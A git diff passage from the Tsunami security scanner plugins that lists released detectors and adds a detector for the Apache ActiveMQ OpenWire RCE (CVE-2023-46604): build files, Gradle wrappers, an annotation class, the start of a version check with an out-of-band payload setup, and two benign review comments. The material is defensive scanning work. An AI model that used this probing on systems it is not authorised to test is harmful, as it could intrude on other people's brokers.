diff --git a/README.md b/README.md index d51b22dcd..026fefec7 100644 --- a/README.md +++ b/README.md 
@@ -7,6 +7,31 @@ Security Scanner plugins. Read how to [contribute to Tsunami](docs/contributing.md). + +## Currently released Tsunami plugins + +### Detectors +#### AI Relevant OSS +* [Pytorch Serve Expose API Detector](https://github.com/google/tsunami-security-scanner-plugins/tree/master/google/detectors/exposedui/pytorch_serve) +* [Ray CVE-2023-48022 Detector](https://github.com/google/tsunami-security-scanner-plugins/tree/master/google/detectors/rce/ai/cve202348022) +* [Ray CVE-2023-6019 Detector](https://github.com/google/tsunami-security-scanner-plugins/tree/master/google/detectors/rce/ai/cve20236019) +* [H2O CVE-2023-6018 Detector](https://github.com/google/tsunami-security-scanner-plugins/tree/master/google/detectors/rce/ai/cve20236018) +* [MLflow CVE-2023-6977 & CVE-2023-1177 & CVE-2023-2780 Detector](https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/mlflow_cve_2023_6977) +* [MLflow CVE-2023-6014 Detector](https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/mlflow_cve_2023_6014) +* [MLflow Weak Credential Detector](https://github.com/google/tsunami-security-scanner-plugins/blob/master/google/detectors/credentials/generic_weak_credential_detector/src/main/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/testers/mlflow/MlFlowCredentialTester.java) +* [Argo Workflow Exposed API Detector](https://github.com/google/tsunami-security-scanner-plugins/blob/master/google/detectors/exposedui/argoworkflow/) +* [MinIO Sensitive Info Disclosure Detector](https://github.com/google/tsunami-security-scanner-plugins/blob/master/community/detectors/minio_cve_2023_28432/) +* [Gradio CVE-2023-51449 Detector](https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/gradio_cve_2023_51449) +* [Apache Spark CVE-2022-33891 
Detector](https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/apache_spark_cve_2022_33891) +* [Apache Spark Expose UI Detector](https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/apache_spark_exposed_webui) +* [Apache Spark Exposed API Detector](https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/rce/apache_spark_exposed_api) +* [Apache Airflow CVE-2020-17526 Auth Bypass RCE](https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/apache_airflow_cve_2020_17526) +* [Triton Inference Server RCE](https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/triton_inference_server_model_overwrite) +* [Intel Neural Compressor CVE-2024-22476 RCE Detector](https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/intel_neural_compressor_cve_2024_22476) +* [ZenML Weak Credential Detector](https://github.com/google/tsunami-security-scanner-plugins/blob/master/google/detectors/credentials/generic_weak_credential_detector/src/main/java/com/google/tsunami/plugins/detectors/credentials/genericweakcredentialdetector/testers/zenml/ZenMlCredentialTester.java) +* [Argo CD Exposed UI](https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/argocd_exposed_ui) +* [Airflow Exposed UI](https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/apache_airflow_exposed_ui) + ## Source Code Headers Every file containing source code must include copyright and license diff --git a/community/README.md b/community/README.md index f462bce40..d0e0e9866 100644 --- a/community/README.md +++ b/community/README.md 
@@ -19,10 +19,21 @@ This directory contains plugins contributed by community members. * [CVE-2021-29441 Nacos < 1.4.1 Authentication Bypass](https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/nacos_cve_2021_29441) #### Remote Code Execution + * [Apache Druid Pre-Auth RCE vulnerability (CVE-2021-25646) Detector](https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/apache_druid_preauth_rce_cve_2021_25646) * [Forgerock AM/OpenAM RCE (CVE-2021-35464) Detector](https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/rce/cve202135464) -* [GitLab CE/EE Unauthenticated RCE using ExifTool and disclosure vulnerability (CVE-2021-29441)](https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/gitlab_cve_2021_22205) -* [Unauthenticated RCE in Laravel <= 8.4.2 using Debug Mode (CVE-2021-3129) Detector](https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/laravel_cve_2021_3129) -* [CVE-2021-26084 Confluence Server RCE via Pre-Auth OGNL Injection (CVE-2021-26084) Detector](https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/confluence_cve_2021_26084) +* [GitLab CE/EE Unauthenticated RCE using ExifTool and disclosure + vulnerability + (CVE-2021-29441)](https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/gitlab_cve_2021_22205) +* [Unauthenticated RCE in Laravel <= 8.4.2 using Debug Mode (CVE-2021-3129) + Detector](https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/laravel_cve_2021_3129) +* [CVE-2021-26084 Confluence Server RCE via Pre-Auth OGNL Injection + (CVE-2021-26084) + Detector](https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/confluence_cve_2021_26084) * [CVE-2022-22965 Spring Framework RCE (CVE-2022-22965) 
Detector](https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/spring_framework_cve_2022_22965) * [Spring Cloud Function CVE-2022-22963 VulnDetector](https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/spring_cloud_function_cve_2022_22963) +* [Apache Spark Exposed API VulnDetector](https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/rce/apache_spark_exposed_api) + +#### Information Disclosure + +* [Apache Sparks exposed Web UI Detector](https://github.com/google/tsunami-security-scanner-plugins/tree/master/community/detectors/apache_spark_exposed_webui) diff --git a/community/detectors/apache_activemq_cve_2023_46604/README.md b/community/detectors/apache_activemq_cve_2023_46604/README.md new file mode 100644 index 000000000..f08619a75 --- /dev/null +++ b/community/detectors/apache_activemq_cve_2023_46604/README.md @@ -0,0 +1,17 @@ +# Apache ActiveMQ RCE CVE-2023-46604 Detector + +This detector checks for Apache ActiveMQ RCE vulnerability (CVE-2023-46604). + +- https://activemq.apache.org/news/cve-2023-46604 +- https://github.com/advisories/GHSA-crg9-44h2-xw35 +- https://nvd.nist.gov/vuln/detail/CVE-2023-46604 + +## Build jar file for this plugin + +Using `gradlew`: + +```shell +./gradlew jar +``` + +Tsunami identifiable jar file is located at `build/libs` directory. diff --git a/community/detectors/apache_activemq_cve_2023_46604/build.gradle b/community/detectors/apache_activemq_cve_2023_46604/build.gradle new file mode 100644 index 000000000..09e4bcce3 --- /dev/null +++ b/community/detectors/apache_activemq_cve_2023_46604/build.gradle 
@@ -0,0 +1,73 @@
+plugins {
+ id 'java-library'
+}
+
+description = 'Tsunami Apache ActiveMQ RCE (CVE-2023-46604) VulnDetector plugin.'
+group 'com.google.tsunami'
+version '0.0.1-SNAPSHOT'
+
+
+repositories {
+ maven { // The google mirror is less flaky than mavenCentral()
+ url 'https://maven-central.storage-download.googleapis.com/repos/central/data/'
+ }
+ mavenCentral()
+ mavenLocal()
+}
+
+java {
+ sourceCompatibility = JavaVersion.VERSION_11
+ targetCompatibility = JavaVersion.VERSION_11
+
+ jar.manifest {
+ attributes('Implementation-Title': name,
+ 'Implementation-Version': version,
+ 'Built-By': System.getProperty('user.name'),
+ 'Built-JDK': System.getProperty('java.version'),
+ 'Source-Compatibility': sourceCompatibility,
+ 'Target-Compatibility': targetCompatibility)
+ }
+
+ javadoc.options {
+ encoding = 'UTF-8'
+ use = true
+ links 'https://docs.oracle.com/javase/8/docs/api/'
+ }
+
+ // Log stacktrace to console when test fails.
+ test {
+ testLogging {
+ exceptionFormat = 'full'
+ showExceptions true
+ showCauses true
+ showStackTraces true
+ }
+ maxHeapSize = '1500m'
+ }
+}
+
+ext {
+ tsunamiVersion = 'latest.release'
+ junitVersion = '4.13'
+ mockitoVersion = '2.28.2'
+ truthVersion = '1.0.1'
+ okhttpVersion = '3.12.0'
+ apacheActiveMqClientVersion = '5.18.4'
+ guiceVersion = '4.2.3'
+}
+
+dependencies {
+ implementation "com.google.tsunami:tsunami-common:${tsunamiVersion}"
+ implementation "com.google.tsunami:tsunami-plugin:${tsunamiVersion}"
+ implementation "com.google.tsunami:tsunami-proto:${tsunamiVersion}"
+ implementation "org.apache.activemq:activemq-client:${apacheActiveMqClientVersion}"
+
+ testImplementation "junit:junit:${junitVersion}"
+ testImplementation "org.mockito:mockito-core:${mockitoVersion}"
+ testImplementation "com.google.truth:truth:${truthVersion}"
+ testImplementation "com.squareup.okhttp3:mockwebserver:${okhttpVersion}"
+ testImplementation "com.google.truth.extensions:truth-java8-extension:${truthVersion}"
+ testImplementation "com.google.truth.extensions:truth-proto-extension:${truthVersion}"
+ testImplementation "com.google.inject:guice:${guiceVersion}"
+ testImplementation "com.google.inject.extensions:guice-testlib:${guiceVersion}"
+}
diff --git a/community/detectors/apache_activemq_cve_2023_46604/gradle/wrapper/gradle-wrapper.jar b/community/detectors/apache_activemq_cve_2023_46604/gradle/wrapper/gradle-wrapper.jar
new file mode 100644
index 000000000..2c3521197
Binary files /dev/null and b/community/detectors/apache_activemq_cve_2023_46604/gradle/wrapper/gradle-wrapper.jar differ
diff --git a/community/detectors/mlflow_cve_2023_1177/gradle/wrapper/gradle-wrapper.properties b/community/detectors/apache_activemq_cve_2023_46604/gradle/wrapper/gradle-wrapper.properties
similarity index 94%
rename from community/detectors/mlflow_cve_2023_1177/gradle/wrapper/gradle-wrapper.properties
rename to community/detectors/apache_activemq_cve_2023_46604/gradle/wrapper/gradle-wrapper.properties
index 8f9797cb5..d04736436 100644
--- a/community/detectors/mlflow_cve_2023_1177/gradle/wrapper/gradle-wrapper.properties
+++ b/community/detectors/apache_activemq_cve_2023_46604/gradle/wrapper/gradle-wrapper.properties
@@ -1,6 +1,6 @@
 distributionBase=GRADLE_USER_HOME
 distributionPath=wrapper/dists
-distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip
+distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip
 networkTimeout=10000
 validateDistributionUrl=true
 zipStoreBase=GRADLE_USER_HOME
diff --git a/community/detectors/apache_activemq_cve_2023_46604/gradlew b/community/detectors/apache_activemq_cve_2023_46604/gradlew
new file mode 100755
index 000000000..f5feea6d6
--- /dev/null
+++ b/community/detectors/apache_activemq_cve_2023_46604/gradlew
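Review bot: `tsunamiVersion = 'latest.release'` in the `ext` block makes the three `com.google.tsunami` dependencies resolve to whatever is newest at build time, so two builds of the same commit can yield different jars and a newly published artifact reaches the plugin without review. Pinning it, e.g. `tsunamiVersion = '<PINNED_VERSION>'` (placeholder), or enabling Gradle dependency locking would make the build reproducible. The `repositories` block also lists `mavenLocal()`; with a dynamic version Gradle may pick the highest candidate across all declared repositories, so an artifact installed in the builder's local Maven cache could be selected. If that entry exists only for developing against a locally built Tsunami core, a comment saying so would help. Separately, `javadoc.options` links to the Java 8 API docs while source and target compatibility are `VERSION_11`.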
@@ -0,0 +1,252 @@ +#!/bin/sh + +# +# Copyright © 2015-2021 the original authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 +# + +############################################################################## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. 
+# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/platforms/jvm/plugins-application/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# +############################################################################## + +# Attempt to set APP_HOME + +# Resolve links: $0 may be a link +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac +done + +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd -P "${APP_HOME:-./}" > /dev/null && printf '%s +' "$PWD" ) || exit + +# Use the maximum available, or set MAX_FD != -1 to use that value. +MAX_FD=maximum + +warn () { + echo "$*" +} >&2 + +die () { + echo + echo "$*" + echo + exit 1 +} >&2 + +# OS specific support (must be 'true' or 'false'). +cygwin=false +msys=false +darwin=false +nonstop=false +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; +esac + +CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar + + +# Determine the Java command to use to start the JVM. 
+if [ -n "$JAVA_HOME" ] ; then + if [ -x "$JAVA_HOME/jre/sh/java" ] ; then + # IBM's JDK on AIX uses strange locations for the executables + JAVACMD=$JAVA_HOME/jre/sh/java + else + JAVACMD=$JAVA_HOME/bin/java + fi + if [ ! -x "$JAVACMD" ] ; then + die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +else + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + +Please set the JAVA_HOME variable in your environment to match the +location of your Java installation." + fi +fi + +# Increase the maximum file descriptors if we can. +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac +fi + +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. 
+ +# For Cygwin or MSYS, switch paths to Windows format before running java +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + + # Now convert the arguments - kludge to limit ourselves to /bin/sh + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) + fi + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg + done +fi + + +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. 
+# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' + +exec "$JAVACMD" "$@" diff --git a/community/detectors/apache_activemq_cve_2023_46604/gradlew.bat b/community/detectors/apache_activemq_cve_2023_46604/gradlew.bat new file mode 100644 index 000000000..9d21a2183 --- /dev/null +++ b/community/detectors/apache_activemq_cve_2023_46604/gradlew.bat 
@@ -0,0 +1,94 @@ +@rem +@rem Copyright 2015 the original author or authors. +@rem +@rem Licensed under the Apache License, Version 2.0 (the "License"); +@rem you may not use this file except in compliance with the License. +@rem You may obtain a copy of the License at +@rem +@rem https://www.apache.org/licenses/LICENSE-2.0 +@rem +@rem Unless required by applicable law or agreed to in writing, software +@rem distributed under the License is distributed on an "AS IS" BASIS, +@rem WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +@rem See the License for the specific language governing permissions and +@rem limitations under the License. +@rem +@rem SPDX-License-Identifier: Apache-2.0 +@rem + +@if "%DEBUG%"=="" @echo off +@rem ########################################################################## +@rem +@rem Gradle startup script for Windows +@rem +@rem ########################################################################## + +@rem Set local scope for the variables with windows NT shell +if "%OS%"=="Windows_NT" setlocal + +set DIRNAME=%~dp0 +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused +set APP_BASE_NAME=%~n0 +set APP_HOME=%DIRNAME% + +@rem Resolve any "." and ".." in APP_HOME to make it shorter. +for %%i in ("%APP_HOME%") do set APP_HOME=%%~fi + +@rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +set DEFAULT_JVM_OPTS="-Xmx64m" "-Xms64m" + +@rem Find java.exe +if defined JAVA_HOME goto findJavaFromJavaHome + +set JAVA_EXE=java.exe +%JAVA_EXE% -version >NUL 2>&1 +if %ERRORLEVEL% equ 0 goto execute + +echo. 1>&2 +echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. 1>&2 +echo. 1>&2 +echo Please set the JAVA_HOME variable in your environment to match the 1>&2 +echo location of your Java installation. 
1>&2 + +goto fail + +:findJavaFromJavaHome +set JAVA_HOME=%JAVA_HOME:"=% +set JAVA_EXE=%JAVA_HOME%/bin/java.exe + +if exist "%JAVA_EXE%" goto execute + +echo. 1>&2 +echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% 1>&2 +echo. 1>&2 +echo Please set the JAVA_HOME variable in your environment to match the 1>&2 +echo location of your Java installation. 1>&2 + +goto fail + +:execute +@rem Setup the command line + +set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar + + +@rem Execute Gradle +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* + +:end +@rem End local scope for the variables with windows NT shell +if %ERRORLEVEL% equ 0 goto mainEnd + +:fail +rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of +rem the _cmd.exe /c_ return code! +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% + +:mainEnd +if "%OS%"=="Windows_NT" endlocal + +:omega diff --git a/community/detectors/apache_activemq_cve_2023_46604/settings.gradle b/community/detectors/apache_activemq_cve_2023_46604/settings.gradle new file mode 100644 index 000000000..ca0e41a24 --- /dev/null +++ b/community/detectors/apache_activemq_cve_2023_46604/settings.gradle @@ -0,0 +1 @@ +rootProject.name = 'apache_activemq_cve_2023_46604' diff --git a/community/detectors/apache_activemq_cve_2023_46604/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202346604/Annotations.java b/community/detectors/apache_activemq_cve_2023_46604/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202346604/Annotations.java new file mode 100644 index 000000000..aba28f36e --- /dev/null +++ b/community/detectors/apache_activemq_cve_2023_46604/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202346604/Annotations.java 
@@ -0,0 +1,35 @@
+/*
+ * Copyright 2024 Google LLC
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package com.google.tsunami.plugins.detectors.cves.cve202346604;
+
+import static java.lang.annotation.ElementType.FIELD;
+import static java.lang.annotation.ElementType.METHOD;
+import static java.lang.annotation.ElementType.PARAMETER;
+
+import java.lang.annotation.Retention;
+import java.lang.annotation.RetentionPolicy;
+import java.lang.annotation.Target;
+import javax.inject.Qualifier;
+
+/** Annotation for {@link Cve202346604Detector}. */
+final class Annotations {
+ private Annotations() {}
+
+ @Qualifier
+ @Retention(RetentionPolicy.RUNTIME)
+ @Target({PARAMETER, METHOD, FIELD})
+ @interface OobSleepDuration {}
+}
diff --git a/community/detectors/apache_activemq_cve_2023_46604/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202346604/Cve202346604Detector.java b/community/detectors/apache_activemq_cve_2023_46604/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202346604/Cve202346604Detector.java
new file mode 100644
index 000000000..2511e2a7f
--- /dev/null
+++ b/community/detectors/apache_activemq_cve_2023_46604/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202346604/Cve202346604Detector.java
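Review bot: `OobSleepDuration` has no Javadoc, and nothing on the qualifier states the unit of the `int` it binds. The detector added in this commit injects it as `@OobSleepDuration int oobSleepDuration` and passes it to `Duration.ofSeconds(...)`, so a binding written in milliseconds would block each scanned service far longer than intended. I would add `/** Seconds to wait for the out-of-band callback before checking whether the payload executed. */` directly above `@Qualifier`. The class-level Javadoc could also read "Guice binding annotations for" rather than "Annotation for", since the class is a holder for qualifiers.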
@@ -0,0 +1,278 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.cves.cve202346604; + +import static com.google.common.base.Preconditions.checkNotNull; +import static com.google.common.collect.ImmutableList.toImmutableList; + +import com.google.common.annotations.VisibleForTesting; +import com.google.common.collect.ImmutableList; +import com.google.common.flogger.GoogleLogger; +import com.google.common.net.HostAndPort; +import com.google.common.util.concurrent.Uninterruptibles; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.data.NetworkEndpointUtils; +import com.google.tsunami.common.time.UtcClock; +import com.google.tsunami.plugin.PluginType; +import com.google.tsunami.plugin.VulnDetector; +import com.google.tsunami.plugin.annotations.ForServiceName; +import com.google.tsunami.plugin.annotations.PluginInfo; +import com.google.tsunami.plugin.payload.Payload; +import com.google.tsunami.plugin.payload.PayloadGenerator; +import com.google.tsunami.plugins.detectors.cves.cve202346604.Annotations.OobSleepDuration; +import com.google.tsunami.proto.AdditionalDetail; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionReportList; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.PayloadGeneratorConfig; +import 
com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.TextData; +import com.google.tsunami.proto.TransportProtocol; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.io.DataInputStream; +import java.io.DataOutputStream; +import java.io.IOException; +import java.io.OutputStream; +import java.lang.annotation.Retention; +import java.lang.annotation.RetentionPolicy; +import java.net.Socket; +import java.time.Clock; +import java.time.Duration; +import java.time.Instant; +import java.util.Map; +import javax.inject.Inject; +import javax.inject.Qualifier; +import javax.net.SocketFactory; +import org.apache.activemq.util.MarshallingSupport; + +/** A {@link VulnDetector} that detects the CVE-2023-46604 vulnerability. */ +@PluginInfo( + type = PluginType.VULN_DETECTION, + name = "Apache ActiveMQ RCE CVE-2023-46604 Detector", + version = "0.1", + description = Cve202346604Detector.VULN_DESCRIPTION_OF_OOB_VERIFY, + author = "hh-hunter", + bootstrapModule = Cve202346604DetectorBootstrapModule.class) +@ForServiceName({"apachemq"}) +public final class Cve202346604Detector implements VulnDetector { + + @VisibleForTesting + static final String VULN_DESCRIPTION_OF_OOB_VERIFY = + "Apache ActiveMQ is vulnerable to Remote Code Execution (RCE). This vulnerability could allow" + + " a remote attacker with network access to a broker to execute arbitrary shell commands" + + " by manipulating serialized class types within the OpenWire protocol, causing the" + + " broker to instantiate any class on the classpath. The presence of this vulnerability" + + " was confirmed through an out-of-band callback."; + + @VisibleForTesting + static final String VULN_DESCRIPTION_OF_VERSION = + "Apache ActiveMQ is susceptible to a Remote Code Execution (RCE) vulnerability. 
This flaw" + + " could enable a remote attacker with network access to a broker to execute arbitrary" + + " shell commands by manipulating serialized class types within the OpenWire protocol," + + " thereby causing the broker to instantiate any class on the classpath. Although the" + + " vulnerability was identified based on the server's version number, it has not been" + + " verified."; + + private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); + + private static final ImmutableList SECURE_VERSIONS = + ImmutableList.of("5.15.16", "5.16.7", "5.17.6", "5.18.3"); + + private final Clock utcClock; + private final SocketFactory socketFactory; + private final PayloadGenerator payloadGenerator; + private final int oobSleepDuration; + + private boolean useOobVerifyVulnerable; + + private String currentVersion; + + @Inject + Cve202346604Detector( + @UtcClock Clock utcClock, + @SocketFactoryInstance SocketFactory socketFactory, + PayloadGenerator payloadGenerator, + @OobSleepDuration int oobSleepDuration) { + this.utcClock = checkNotNull(utcClock); + this.socketFactory = checkNotNull(socketFactory); + this.payloadGenerator = checkNotNull(payloadGenerator); + this.oobSleepDuration = oobSleepDuration; + } + + public static boolean checkVersionIsSecure(String currentVersion) { + String[] parts1 = currentVersion.split("\\."); + for (String secureVersion : SECURE_VERSIONS) { + String[] parts2 = secureVersion.split("\\."); + if (parts1[0].equals(parts2[0])) { + if (parts1[1].equals(parts2[1])) { + return Integer.parseInt(parts1[2]) >= Integer.parseInt(parts2[2]); + } + } + } + // If no secure minor version matches the current version, it's considered not secure by + // default. 
+ return false; + } + + @Override + public DetectionReportList detect( + TargetInfo targetInfo, ImmutableList matchedServices) { + logger.atInfo().log("CVE-2023-46604 starts detecting."); + + return DetectionReportList.newBuilder() + .addAllDetectionReports( + matchedServices.stream() + .filter(this::isTransportProtocolTcp) + .filter(this::isServiceVulnerable) + .map(networkService -> buildDetectionReport(targetInfo, networkService)) + .collect(toImmutableList())) + .build(); + } + + private boolean isTransportProtocolTcp(NetworkService networkService) { + return TransportProtocol.TCP.equals(networkService.getTransportProtocol()); + } + + private boolean isServiceVulnerable(NetworkService networkService) { + HostAndPort hp = NetworkEndpointUtils.toHostAndPort(networkService.getNetworkEndpoint()); + currentVersion = getServerVersion(hp.getHost(), hp.getPort()); + if (checkVersionIsSecure(currentVersion)) { + logger.atInfo().log("The target version %s is not susceptible.", currentVersion); + return false; + } + + PayloadGeneratorConfig config = + PayloadGeneratorConfig.newBuilder() + .setVulnerabilityType(PayloadGeneratorConfig.VulnerabilityType.SSRF) + .setInterpretationEnvironment( + PayloadGeneratorConfig.InterpretationEnvironment.INTERPRETATION_ANY) + .setExecutionEnvironment(PayloadGeneratorConfig.ExecutionEnvironment.EXEC_ANY) + .build(); + + Payload payload = this.payloadGenerator.generate(config); + if 